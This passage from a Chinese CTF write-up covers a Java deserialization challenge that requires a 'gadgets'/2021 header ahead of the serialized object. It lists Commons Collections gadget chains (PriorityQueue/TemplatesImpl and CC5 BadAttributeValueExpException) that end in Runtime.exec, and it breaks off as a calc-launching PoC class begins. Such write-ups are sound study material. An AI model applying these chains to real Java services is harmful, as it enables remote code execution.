我们平常在使用ysoserial这样的工具时,并不会太在意payload是如何生成的。反正工具一把梭就完事了,但是出题人总是想尽办法不让我们使用工具。所以没办法,只能自己写了。
题目复现给出源码结构如下
controller作为控制器,并且只有一个class,那么漏洞点肯定在这里面。给出代码如下
readObject是典型的java反序列化,这里的输入流可控。我们传入data后,会将数据直接存放到ObjectInputStream对象中。
这里直接使用ysoserial,很容易发现存在一个问题,就是这里不但有反序列化,还有如下语句。
String name = objectInputStream.readUTF();
int year = objectInputStream.readInt();
if (name.equals("gadgets") && year == 2021)
这里要求我们传入的流必须包含两个正确的信息,只有两个信息正确才能进行反序列化。
那么这里就需要自己去构造了。既然有readUTF,那么就有writeUTF,只要按顺序写入就行。那么如何构造呢?
要利用readObject,首先想到使用TemplateImpl类来构造POC,但本人尝试未成功。
PriorityQueue.readObject()
PriorityQueue.heapify()
PriorityQueue.siftDown()
PriorityQueue.siftDownUsingConparator()
TransformingComparator.compare()
InvokerTransformer.transform()
TemplatesImpl.newTranformer()
Method.invoke()
Runtime.exec()
于是换了一个利用链,就是CC5的BadAttributeValueExpException利用链,调用栈如下
BadAttributeValueExpException.readObject()
TiedMapEntry.toString()
LazyMap.get()
ChainedTransformer.transform()
ConstantTransformer.transform()
InvokerTransformer.transform()
Runtime.exec()
先使用反射获取类来调用calc
class Poc2 {
public static void main(